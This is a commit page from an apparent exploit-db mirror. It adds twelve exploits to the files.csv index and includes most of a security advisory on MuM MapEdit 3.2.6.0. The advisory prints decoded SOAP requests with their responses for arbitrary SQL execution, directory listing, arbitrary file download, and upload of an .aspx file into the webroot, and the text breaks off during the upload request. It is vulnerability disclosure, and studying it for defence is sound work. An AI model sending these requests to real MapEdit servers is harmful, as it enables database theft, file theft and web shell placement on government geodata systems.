bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-09-20

Browse source 
12 new exploits

OpenSSL ASN.1<= 0.9.6j 0.9.7b - Brute Forcer for Parsing Bugs
OpenSSL ASN.1 <= 0.9.6j / 0.9.7b - Brute Forcer for Parsing Bugs

ZineBasic 1.1 - Arbitrary File Disclosure

SolarWinds Kiwi CatTools 3.11.0 - Unquoted Service Path Privilege Escalation

VMware Workstation - vprintproxy.exe JPEG2000 Images Multiple Memory Corruptions

VMware Workstation - vprintproxy.exe TrueType NAME Tables Heap Buffer Overflow

MuM MapEdit 3.2.6.0 - Multiple Vulnerabilities

MyBB 1.8.6 - SQL Injection

Kajona 4.7 - Cross-Site Scripting / Directory Traversal

Docker Daemon - Privilege Escalation (Metasploit)

SolarWinds Kiwi Syslog Server 9.5.1 - Unquoted Service Path Privilege Escalation

EKG Gadu 1.9~pre+r2855-3+b1 - Local Buffer Overflow

WordPress Plugin Order Export Import for WooCommerce - Order Information Disclosure

PHP 5.0.0 - 'tidy_parse_file()' Buffer Overflow
This commit is contained in:
Offensive Security 2016-09-20 05:07:15 +00:00
parent 99fb353a74
commit 235761b103
13 changed files with 1204 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

14
files.csv
View file

@ -141,7 +141,7 @@ id,file,description,date,author,platform,type,port
143,platforms/linux/remote/143.c,"lftp 2.6.9 - Remote Stack based Overflow",2004-01-14,Li0n7,linux,remote,0
144,platforms/linux/local/144.c,"SuSE Linux 9.0 - YaST config Skribt Local Exploit",2004-01-15,l0om,linux,local,0
145,platforms/linux/local/145.c,"Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation (3)",2004-01-15,"Paul Starzetz",linux,local,0
146,platforms/multiple/dos/146.c,"OpenSSL ASN.1<= 0.9.6j 0.9.7b - Brute Forcer for Parsing Bugs",2003-10-09,"Bram Matthys",multiple,dos,0
146,platforms/multiple/dos/146.c,"OpenSSL ASN.1 <= 0.9.6j / 0.9.7b - Brute Forcer for Parsing Bugs",2003-10-09,"Bram Matthys",multiple,dos,0
147,platforms/windows/dos/147.c,"Need for Speed 2 - Remote Client Buffer Overflow",2004-01-23,"Luigi Auriemma",windows,dos,0
148,platforms/windows/dos/148.sh,"Microsoft Windows 2003/XP - Samba Share Resource Exhaustion Exploit",2004-01-25,"Steve Ladjabi",windows,dos,0
149,platforms/windows/remote/149.c,"Serv-U FTPD 3.x/4.x - 'SITE CHMOD' Command Remote Exploit",2004-01-27,lion,windows,remote,21
@ -21067,6 +21067,7 @@ id,file,description,date,author,platform,type,port
23851,platforms/asp/webapps/23851.txt,"Expinion.net Member Management System 2.1 - news_view.asp ID Parameter SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps,0
23852,platforms/asp/webapps/23852.txt,"Expinion.net Member Management System 2.1 - resend.asp ID Parameter SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps,0
23853,platforms/asp/webapps/23853.txt,"Expinion.net Member Management System 2.1 - error.asp err Parameter Cross-Site Scripting",2004-03-20,"Manuel Lopez",asp,webapps,0
40401,platforms/php/webapps/40401.txt,"ZineBasic 1.1 - Arbitrary File Disclosure",2016-09-19,bd0rk,php,webapps,80
23854,platforms/asp/webapps/23854.txt,"Expinion.net Member Management System 2.1 - register.asp err Parameter Cross-Site Scripting",2004-03-20,"Manuel Lopez",asp,webapps,0
23855,platforms/hardware/remote/23855.txt,"Allied Telesis AT-MCF2000M 3.0.2 - Gaining Root Shell Access",2013-01-03,dun,hardware,remote,0
23856,platforms/php/remote/23856.rb,"WordPress Plugin Advanced Custom Fields - Remote File Inclusion (Metasploit)",2013-01-03,Metasploit,php,remote,0
@ -21169,6 +21170,7 @@ id,file,description,date,author,platform,type,port
23957,platforms/php/webapps/23957.txt,"TikiWiki Project 1.8 - tiki-index.php comments_threshold Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0
23958,platforms/php/webapps/23958.txt,"TikiWiki Project 1.8 - tiki-print_article.php articleId Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0
23959,platforms/php/webapps/23959.txt,"TikiWiki Project 1.8 - tiki-list_file_gallery.php galleryID Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0
40400,platforms/windows/local/40400.txt,"SolarWinds Kiwi CatTools 3.11.0 - Unquoted Service Path Privilege Escalation",2016-09-19,"Halil Dalabasmaz",windows,local,0
23960,platforms/php/webapps/23960.txt,"TikiWiki Project 1.8 - tiki-upload_file.php galleryID Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0
23961,platforms/php/webapps/23961.txt,"TikiWiki Project 1.8 - tiki-view_faq.php faqId Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0
23962,platforms/php/webapps/23962.txt,"TikiWiki Project 1.8 - tiki-view_chart.php chartId Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0
@ -21364,6 +21366,7 @@ id,file,description,date,author,platform,type,port
24160,platforms/linux/remote/24160.txt,"SquirrelMail 1.x - Email Header HTML Injection",2004-05-31,"Roman Medina",linux,remote,0
24161,platforms/windows/remote/24161.txt,"Sambar Server 6.1 Beta 2 - show.asp show Parameter Cross-Site Scripting",2004-06-01,"Oliver Karow",windows,remote,0
24162,platforms/windows/remote/24162.txt,"Sambar Server 6.1 Beta 2 - showperf.asp title Parameter Cross-Site Scripting",2004-06-01,"Oliver Karow",windows,remote,0
40399,platforms/windows/dos/40399.txt,"VMware Workstation - vprintproxy.exe JPEG2000 Images Multiple Memory Corruptions",2016-09-19,"Google Security Research",windows,dos,0
24163,platforms/windows/remote/24163.txt,"Sambar Server 6.1 Beta 2 - showini.asp Arbitrary File Access",2004-06-01,"Oliver Karow",windows,remote,0
24164,platforms/cgi/webapps/24164.txt,"Rit Research Labs TinyWeb 1.9.2 - Unauthorized Script Disclosure",2004-06-01,"Ziv Kamir",cgi,webapps,0
24165,platforms/linux/remote/24165.pl,"Firebird 1.0 - Remote Unauthenticated Database Name Buffer Overrun",2004-06-01,wsxz,linux,remote,0
@ -21497,6 +21500,7 @@ id,file,description,date,author,platform,type,port
24296,platforms/php/webapps/24296.txt,"Nucleus CMS 3.0 / Blog:CMS 3 / PunBB 1.x - Common.php Remote File Inclusion",2004-07-20,"Radek Hulan",php,webapps,0
24297,platforms/windows/remote/24297.pl,"Serena TeamTrack 6.1.1 - Remote Authentication Bypass",2004-07-21,"Noam Rathaus",windows,remote,0
24298,platforms/asp/webapps/24298.pl,"Internet Software Sciences Web+Center 4.0.1 - Cookie Object SQL Injection",2004-07-21,"Noam Rathaus",asp,webapps,0
40398,platforms/windows/dos/40398.txt,"VMware Workstation - vprintproxy.exe TrueType NAME Tables Heap Buffer Overflow",2016-09-19,"Google Security Research",windows,dos,0
24299,platforms/asp/webapps/24299.pl,"NetSupport DNA HelpDesk 1.0 Problist Script - SQL Injection",2004-07-21,"Noam Rathaus",asp,webapps,0
24300,platforms/asp/webapps/24300.pl,"Leigh Business Enterprises Web HelpDesk 4.0 - SQL Injection",2004-07-21,"Noam Rathaus",asp,webapps,0
24301,platforms/php/webapps/24301.html,"Mensajeitor Tag Board 1.x - Authentication Bypass",2004-07-21,"Jordi Corrales",php,webapps,0
@ -22394,6 +22398,7 @@ id,file,description,date,author,platform,type,port
25240,platforms/php/webapps/25240.txt,"CoolForum 0.5/0.7/0.8 - register.php login Parameter SQL Injection",2005-03-19,Romano,php,webapps,0
25241,platforms/php/webapps/25241.html,"PHP-Fusion 4/5 - Setuser.php HTML Injection",2005-03-19,"PersianHacker Team",php,webapps,0
25242,platforms/php/webapps/25242.txt,"Ciamos 0.9.2 - Highlight.php File Disclosure",2005-03-19,"Majid NT",php,webapps,0
40397,platforms/aspx/webapps/40397.txt,"MuM MapEdit 3.2.6.0 - Multiple Vulnerabilities",2016-09-19,"Paul Baade and Sven Krewitt",aspx,webapps,0
25243,platforms/php/webapps/25243.txt,"TRG News 3.0 Script - Remote File Inclusion",2005-03-21,Frank_Reiner,php,webapps,0
25244,platforms/php/webapps/25244.txt,"CzarNews 1.13/1.14 - headlines.php Remote File Inclusion",2005-03-21,brOmstar,php,webapps,0
25245,platforms/php/webapps/25245.txt,"Social Site Generator 2.2 - Cross-Site Request Forgery (Add Admin)",2013-05-06,Fallaga,php,webapps,0
@ -22486,6 +22491,7 @@ id,file,description,date,author,platform,type,port
25334,platforms/linux/dos/25334.txt,"Mozilla Suite/Firefox - JavaScript Lambda Replace Heap Memory Disclosure",2005-04-04,"Daniel McNeil",linux,dos,0
25335,platforms/unix/remote/25335.txt,"IBM iSeries AS400 LDAP Server - Remote Information Disclosure",2005-04-04,"Shalom Carmel",unix,remote,0
25336,platforms/windows/remote/25336.txt,"Logics Software LOG-FT - Arbitrary File Disclosure",2005-04-05,"Pedro Viuales and Rom Ramirez",windows,remote,0
40396,platforms/php/webapps/40396.txt,"MyBB 1.8.6 - SQL Injection",2016-09-19,"Curesec Research Team",php,webapps,80
25337,platforms/php/webapps/25337.txt,"ProfitCode Software PayProCart 3.0 - Usrdetails.php Cross-Site Scripting",2005-04-05,"Diabolic Crab",php,webapps,0
25338,platforms/php/webapps/25338.txt,"profitcode software payprocart 3.0 - Directory Traversal",2005-04-05,"Diabolic Crab",php,webapps,0
25339,platforms/php/webapps/25339.txt,"PHP-Nuke 6.x/7.x Your_Account Module - 'Username' Cross-Site Scripting",2005-04-05,sp3x@securityreason.com,php,webapps,0
@ -22654,6 +22660,7 @@ id,file,description,date,author,platform,type,port
25508,platforms/asp/webapps/25508.txt,"CartWIZ 1.10 - ProductDetails.asp SQL Injection",2005-04-23,Dcrab,asp,webapps,0
25509,platforms/asp/webapps/25509.txt,"CartWIZ 1.10 - searchresults.asp PriceTo Argument SQL Injection",2005-04-23,Dcrab,asp,webapps,0
25510,platforms/asp/webapps/25510.txt,"CartWIZ 1.10 - searchresults.asp PriceFrom Argument SQL Injection",2005-04-23,Dcrab,asp,webapps,0
40395,platforms/php/webapps/40395.txt,"Kajona 4.7 - Cross-Site Scripting / Directory Traversal",2016-09-19,"Curesec Research Team",php,webapps,80
25511,platforms/asp/webapps/25511.txt,"CartWIZ 1.10 - searchresults.asp idcategory Argument SQL Injection",2005-04-23,Dcrab,asp,webapps,0
25512,platforms/asp/webapps/25512.txt,"CartWIZ 1.10 - TellAFriend.asp Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0
25513,platforms/asp/webapps/25513.txt,"CartWIZ 1.10 - AddToWishlist.asp Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0
@ -22720,6 +22727,7 @@ id,file,description,date,author,platform,type,port
25574,platforms/multiple/remote/25574.txt,"Mtp-Target 1.2.2 Client - Remote Format String",2005-05-02,"Luigi Auriemma",multiple,remote,0
25575,platforms/php/webapps/25575.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - basket.php Multiple Parameter Cross-Site Scripting",2005-05-02,Lostmon,php,webapps,0
25576,platforms/php/webapps/25576.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - 'page.php' page Parameter Cross-Site Scripting",2005-05-02,Lostmon,php,webapps,0
40394,platforms/linux/local/40394.rb,"Docker Daemon - Privilege Escalation (Metasploit)",2016-09-19,Metasploit,linux,local,0
25577,platforms/php/webapps/25577.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - reviews.php Multiple Parameter Cross-Site Scripting",2005-05-02,Lostmon,php,webapps,0
25578,platforms/php/webapps/25578.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - product_details.php category_id Parameter Cross-Site Scripting",2005-05-02,Lostmon,php,webapps,0
25579,platforms/php/webapps/25579.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - products.php Multiple Parameter Cross-Site Scripting",2005-05-02,Lostmon,php,webapps,0
@ -22811,6 +22819,7 @@ id,file,description,date,author,platform,type,port
25661,platforms/asp/webapps/25661.txt,"Keyvan1 ImageGallery - Database Download",2005-05-01,"g0rellazz G0r",asp,webapps,0
25662,platforms/php/webapps/25662.txt,"Skull-Splitter Guestbook 1.0/2.0/2.2 - Multiple HTML Injection Vulnerabilities",2005-05-14,"Morinex Eneco",php,webapps,0
25663,platforms/php/webapps/25663.txt,"Shop-Script - categoryId SQL Injection",2005-05-16,"CENSORED Search Vulnerabilities",php,webapps,0
40393,platforms/windows/local/40393.txt,"SolarWinds Kiwi Syslog Server 9.5.1 - Unquoted Service Path Privilege Escalation",2016-09-19,"Halil Dalabasmaz",windows,local,0
25664,platforms/php/webapps/25664.txt,"Shop-Script - ProductID SQL Injection",2005-05-16,"CENSORED Search Vulnerabilities",php,webapps,0
25665,platforms/php/webapps/25665.txt,"PostNuke 0.75/0.76 Blocks Module - Directory Traversal",2005-05-16,pokley,php,webapps,0
25666,platforms/cgi/webapps/25666.txt,"PServ 3.2 - Source Code Disclosure",2005-05-16,"Claus R. F. Overbeck",cgi,webapps,0
@ -22873,6 +22882,7 @@ id,file,description,date,author,platform,type,port
25725,platforms/windows/local/25725.rb,"AdobeCollabSync - Buffer Overflow Adobe Reader X Sandbox Bypass (Metasploit)",2013-05-26,Metasploit,windows,local,0
25726,platforms/php/webapps/25726.txt,"RadioCMS 2.2 - (menager.php playlist_id Parameter) SQL Injection",2013-05-26,Rooster(XEKA),php,webapps,0
25727,platforms/php/webapps/25727.txt,"BookReview 1.0 - add_review.htm Multiple Parameter Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0
40392,platforms/linux/local/40392.py,"EKG Gadu 1.9~pre+r2855-3+b1 - Local Buffer Overflow",2016-09-19,"Juan Sacco",linux,local,0
25728,platforms/php/webapps/25728.txt,"BookReview 1.0 - add_contents.htm Multiple Parameter Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0
25729,platforms/php/webapps/25729.txt,"BookReview 1.0 - suggest_category.htm node Parameter Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0
25730,platforms/php/webapps/25730.txt,"BookReview 1.0 - contact.htm user Parameter Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0
@ -22904,6 +22914,7 @@ id,file,description,date,author,platform,type,port
25756,platforms/php/webapps/25756.txt,"India Software Solution Shopping Cart - SQL Injection",2005-05-28,Rayden,php,webapps,0
25757,platforms/multiple/dos/25757.txt,"Firefly Studios Stronghold 2 - Remote Denial of Service",2005-05-28,"Luigi Auriemma",multiple,dos,0
25758,platforms/asp/webapps/25758.txt,"Hosting Controller 6.1 - User Profile Unauthorized Access",2005-05-30,"GrayHatz Security Group",asp,webapps,0
40391,platforms/php/webapps/40391.txt,"WordPress Plugin Order Export Import for WooCommerce - Order Information Disclosure",2016-09-19,david-peltier,php,webapps,80
25759,platforms/php/webapps/25759.txt,"Qualiteam X-Cart 4.0.8 - home.php Multiple Parameter Cross-Site Scripting",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0
25760,platforms/php/webapps/25760.txt,"Qualiteam X-Cart 4.0.8 - product.php Multiple Parameter Cross-Site Scripting",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0
25761,platforms/php/webapps/25761.txt,"Qualiteam X-Cart 4.0.8 - error_message.php id Parameter Cross-Site Scripting",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0
@ -22987,6 +22998,7 @@ id,file,description,date,author,platform,type,port
25836,platforms/windows/remote/25836.py,"Intrasrv Simple Web Server 1.0 - SEH Based Remote Code Execution",2013-05-30,xis_one,windows,remote,0
25837,platforms/linux/dos/25837.txt,"Monkey HTTPD 1.1.1 - Crash (PoC)",2013-05-30,"Doug Prostko",linux,dos,0
25838,platforms/php/webapps/25838.pl,"Ultimate PHP Board 1.8/1.9 - Weak Password Encryption",2005-06-16,"Alberto Trivero",php,webapps,0
40389,platforms/windows/local/40389.php,"PHP 5.0.0 - 'tidy_parse_file()' Buffer Overflow",2016-09-19,"Yakir Wizman",windows,local,0
25839,platforms/asp/webapps/25839.txt,"Cool Cafe Chat 1.2.1 - 'login.asp' SQL Injection",2005-06-16,"Morning Wood",asp,webapps,0
25840,platforms/php/webapps/25840.txt,"osCommerce 2.1/2.2 - Multiple HTTP Response Splitting Vulnerabilities",2005-06-17,"James Bercegay",php,webapps,0
25841,platforms/windows/remote/25841.txt,"Yaws 1.5x - Source Code Disclosure",2005-06-17,"Daniel Fabian",windows,remote,0

Can't render this file because it is too large.

389
platforms/aspx/webapps/40397.txt Executable file
View file

@ -0,0 +1,389 @@
# Security Advisory -- Multiple Vulnerabilities - MuM Map Edit
## Product
Vendor: Mensch und Maschine Software SE / Mensch und Maschine acadGraph GmbH
Product: MapEdit
Affected software version: 3.2.6.0
MuM MapEdit provides geodata to the internet and intranets and is deployed on several communal and
regional governmental infrastructures to provide geodata to the population. It consists of a
silverlight client and a C#.NET backend. The communication between them is HTTP/S based and involves
the NBFS (.NET Binary Format SOAP).
Link: http://www.mum.de/DE_Autodesk-Topobase-GIS-Datenerfassung-MuM-MapEdit.CAD
## Status/Metrics/Identifier
CVE-ID: tbd
CVSS v2 Vector: (AV:N/AC:L/Au:S/C:C/I:C/A:C)
CVSS Score: 9.0
The CVSS Score reflects the possibility of an attacker to upload web shells and execute them with
the privileges of the web server user.
## Author/Credits
Paul Baade (TÜV Rheinland i-sec GmbH)
Sven Krewitt (TÜV Rheinland i-sec GmbH)
## Fixed Versions
According to MuM all described vulnerabilities are fixed in version 6.2.74, some of them are reportedly
already fixed in version 5.1.
## Authentication via GET Parameter
The application requires users to provide their credentials via GET Parameters. They can therefore
possibly be found in server logs or proxy logs. An example URL would be:
/Mum.Geo.Services/Start.aspx?AutoUrl=1&Username=TEST&Password=TEST[...]
## Execution of arbitrary SQL commands on contained SQLite DBs
The application contains several SQLite databases. An authenticated user may send POST requests to
the URL /Mum.Geo.Services/DataAccessService.svc. This service is used to execute SQL queries
on the databases.
The content of the POST request is encoded in Microsofts NBFS (.NET Binary Format SOAP) and can be
decoded to the following XML data:
Request:
--------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:DataAccessService/QueryData</a:Action>
<a:MessageID>urn:uuid:b086a157-1bce-41be-b25c-492ab4f6dfa3</a:MessageID>
<a:SequenceAcknowledgement>
<a:ReplyTo>http://www.w3.org/2005/08/addressing/anonymous</a:ReplyTo>
</a:SequenceAcknowledgement>
<a:To s:mustUnderstand="1">http://[host]/Mum.Geo.Services/DataAccessService.svc</a:To>
</s:Header>
<s:Body>
<QueryData>
<connection i:type="c:SQLiteConnection" xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.DataAccess" xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:c="http://schemas.datacontract.org/2004/07/Mum.Geo.DataAccess.SQLite">
<b:CurrentRepresentation>
<b:CollectionFeatureClassName/>
<b:Id>0</b:Id>
<b:LineFeatureClassName/>
<b:Name/>
<b:PointFeatureClassName/>
<b:PolygonFeatureClassName/>
</b:CurrentRepresentation>
<b:DbVersion>999</b:DbVersion>
<b:Id>0</b:Id>
<b:Name>SYSTEM</b:Name>
<b:StorageSchemaType>Unknown</b:StorageSchemaType>
<c:Filename>[path_to_MumGeoData]\System\System.db</c:Filename>
</connection>
<sql>select name, caption, version_systemdata from project where id in (select Project_id from usergroup_project where usergroup_id in (select usergroup_id from user_usergroup where user_id in (select id from user where name='TEST'))) order by caption</sql>
<queryDefinition xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.DataAccess" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
<b:Columns/>
<b:SRID>0</b:SRID>
</queryDefinition>
<parameterNames xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.DataAccess" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/>
<parameterValues xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/>
<startRow>1</startRow>
<bufferSize>2000</bufferSize>
<limit>0</limit>
</QueryData>
</s:Body>
</s:Envelope>
The node "Filename" can be used to access different SQLite databases on the system, while the node
"sql" contains the SQL-query to be executed on the system.
Responses to this request are encoded in NBFS as well and can be decoded to the following XML data:
Response:
---------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:DataAccessService/QueryDataResponse</a:Action>
<a:RelatesTo>urn:uuid:b086a157-1bce-41be-b25c-492ab4f6dfa3</a:RelatesTo>
</s:Header>
<s:Body>
<QueryDataResponse>
<QueryDataResult xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.Core" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
<b:Parameter xmlns:c="http://schemas.datacontract.org/2004/07/Mum.Geo.DataAccess">
<c:Data>eNpjZAACZncXTwihYm6SlpiUammsa2hpaKlrkmhsrpuYamSpa2RkbGxpkZpsYZCSDAD4Jgsj</c:Data>
<c:FetchedAllRows>true</c:FetchedAllRows>
<c:ResultColumns>
<c:DbColumnDefinition>
<c:Caption>NAME</c:Caption>
<c:DataType>DbString</c:DataType>
<c:DefaultValue/>
<c:IsNullable>false</c:IsNullable>
<c:IsPrimaryKey>false</c:IsPrimaryKey>
<c:Length>255</c:Length>
<c:Name>NAME</c:Name>
<c:Precision>0</c:Precision>
<c:Scale>0</c:Scale>
</c:DbColumnDefinition>
<c:DbColumnDefinition>
<c:Caption>CAPTION</c:Caption>
<c:DataType>DbString</c:DataType>
<c:DefaultValue/>
<c:IsNullable>false</c:IsNullable>
<c:IsPrimaryKey>false</c:IsPrimaryKey>
<c:Length>255</c:Length>
<c:Name>CAPTION</c:Name>
<c:Precision>0</c:Precision>
<c:Scale>0</c:Scale>
</c:DbColumnDefinition>
<c:DbColumnDefinition>
<c:Caption>VERSION_SYSTEMDATA</c:Caption>
<c:DataType>DbString</c:DataType>
<c:DefaultValue/>
<c:IsNullable>true</c:IsNullable>
<c:IsPrimaryKey>false</c:IsPrimaryKey>
<c:Length>40</c:Length>
<c:Name>VERSION_SYSTEMDATA</c:Name>
<c:Precision>0</c:Precision>
<c:Scale>0</c:Scale>
</c:DbColumnDefinition>
</c:ResultColumns>
</b:Parameter>
<b:State>
<b:Tags>
<b:Item i:nil="true"/>
</b:Tags>
<b:ExceptionMessage/>
<b:StackTrace/>
<b:Succeeded>true</b:Succeeded>
</b:State>
</QueryDataResult>
</QueryDataResponse>
</s:Body>
</s:Envelope>
The nodes "DbColumnDefinition" contain the definition of the returned columns, the node "Data"
contains the result of the SQL-query as an Base64-encoded zlib-compressed data:
GDI|GDI|74fabe93-1919-4a37-ae29-223398ec80dc
The same result can be produced, when the database is locally read:
>sqlite3 System.db
sqlite> select name, caption, version_systemdata from project where id
in (select Project_id from usergroup_project where usergroup_id
in (select usergroup_id from user_usergroup where user_id
in (select id from user where name='TEST'))) order by caption;
GDI|GDI|74fabe93-1919-4a37-ae29-223398ec80dc
## Arbitrary file manipulation
By sending POST requests to the URL /Mum.Geo.Services/IO.svc an authenticated user is able to
perform several actions.
Most interesting, from an attacker's point of view, would be the following:
- "GetFileName", which lists files in a given folder
- "DownloadFile", which enables the user to download any file the web server has read-access to
- "UploadFile", which allows to upload files to folders the web server has write-access to
The different activities are documented in the subsections below.
As well as in the SQL execution section, the request and response content is decoded from NBFS for
better readability.
### File exploration
An authenticated user is able to list all files in a given folder by sending the following content
to the IO Service.
Request:
--------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:IO/GetFileNames</a:Action>
<a:MessageID>urn:uuid:037dee48-520a-46ae-a47b-b9b57a901676</a:MessageID>
<a:SequenceAcknowledgement>
<a:ReplyTo>http://www.w3.org/2005/08/addressing/anonymous</a:ReplyTo>
</a:SequenceAcknowledgement>
<a:To s:mustUnderstand="1">http://[host]/Mum.Geo.Services/IO.svc</a:To>
</s:Header>
<s:Body>
<GetFileNames>
<path>[path_to_webroot]</path>
<searchPattern>*.*</searchPattern>
<recursive>false</recursive>
</GetFileNames>
</s:Body>
</s:Envelope>
Response:
---------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:IO/GetFileNamesResponse</a:Action>
<a:RelatesTo>urn:uuid:037dee48-520a-46ae-a47b-b9b57a901676</a:RelatesTo>
</s:Header>
<s:Body>
<GetFileNamesResponse>
<GetFileNamesResult xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.Core" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
<b:Parameter xmlns:c="http://schemas.datacontract.org/2004/07/Mum.Geo.IO">
<c:FileNames xmlns:d="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
<d:string>clientaccesspolicy.xml</d:string>
<d:string>crossdomain.xml</d:string>
<d:string>iisstart.htm</d:string>
<d:string>index.html</d:string>
<d:string>index.php</d:string>
<d:string>Thumbs.db</d:string>
<d:string>web.config</d:string>
<d:string>welcome.png</d:string>
</c:FileNames>
<c:Path>[path_to_webroot]</c:Path>
</b:Parameter>
<b:State>
<b:Tags>
<b:Item i:nil="true"/>
</b:Tags>
<b:ExceptionMessage/>
<b:StackTrace/>
<b:Succeeded>true</b:Succeeded>
</b:State>
</GetFileNamesResult>
</GetFileNamesResponse>
</s:Body>
</s:Envelope>
### Download of arbitrary files
The same web service can be abused to download any file, that the web server user has read-access to.
Request:
--------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:IO/DownloadFile</a:Action>
<a:MessageID>urn:uuid:48428e6d-19b5-42e2-ad6c-6bfde4849504</a:MessageID>
<a:SequenceAcknowledgement>
<a:ReplyTo>http://www.w3.org/2005/08/addressing/anonymous</a:ReplyTo>
</a:SequenceAcknowledgement>
<a:To s:mustUnderstand="1">http://[host]/Mum.Geo.Services/IO.svc</a:To>
</s:Header>
<s:Body>
<DownloadFile>
<filename>[path_to_webroot]\Mum.Geo.Services\Admin.html</filename>
</DownloadFile>
</s:Body>
</s:Envelope>
Response:
---------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:IO/DownloadFileResponse</a:Action>
<a:RelatesTo>urn:uuid:48428e6d-19b5-42e2-ad6c-6bfde4849504</a:RelatesTo>
</s:Header>
<s:Body>
<DownloadFileResponse>
<DownloadFileResult xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.Server.Core.IO" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
<b:Data>77u/PCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBYSFRNTCAxLjAgVHJhbnNpdGlvbmFsLy9FTiIgImh0dHA6Ly93d3cudzMub3JnL1RSL3hodG1sMS9EVEQveGh0bWwxLXRyYW5zaXRpb25hbC5kdGQiPg0KPGh0bWwgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiPg0KPGhlYWQ+DQogICAgPHRpdGxlPkFkbWluPC90aXRsZT4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwOyBVUkw9U3RhcnQuYXNweD9BZG1pbk1vZGU9dHJ1ZSIvPg0KPC9oZWFkPg0KPGJvZHk+DQogIDxwPjxhIGhyZWY9IlN0YXJ0LmFzcHg/QWRtaW5Nb2RlPXRydWUiPlN0YXJ0IE11bSBBZG1pbmlzdHJhdG9yPC9hPjwvcD4gDQo8L2JvZHk+DQo8L2h0bWw+DQo=</b:Data>
<b:FileNotFound>false</b:FileNotFound>
<b:IsComplete>true</b:IsComplete>
</DownloadFileResult>
</DownloadFileResponse>
</s:Body>
</s:Envelope>
The node "Data" itself can be base64-decoded, to receive the file contents:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Admin</title>
<meta http-equiv="refresh" content="0; URL=Start.aspx?AdminMode=true"/>
</head>
<body>
<p><a href="Start.aspx?AdminMode=true">Start Mum Administrator</a></p>
</body>
</html>
### Upload of arbitrary files
The web service can be abused to upload a file to any folder, that the web server user has
write-access to.
Request:
--------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:IO/UploadFile</a:Action>
<a:MessageID>urn:uuid:20cca52e-da4c-4981-a433-eb596411d89a</a:MessageID>
<a:SequenceAcknowledgement>
<a:ReplyTo>http://www.w3.org/2005/08/addressing/anonymous</a:ReplyTo>
</a:SequenceAcknowledgement>
<a:To s:mustUnderstand="1">http://[host]/Mum.Geo.Services/IO.svc</a:To>
</s:Header>
<s:Body>
<UploadFile>
<clientFilename/>
<serverFilename>[path_to_webroot]\MumGeoData\Userdata\GDI\isec.aspx</serverFilename>
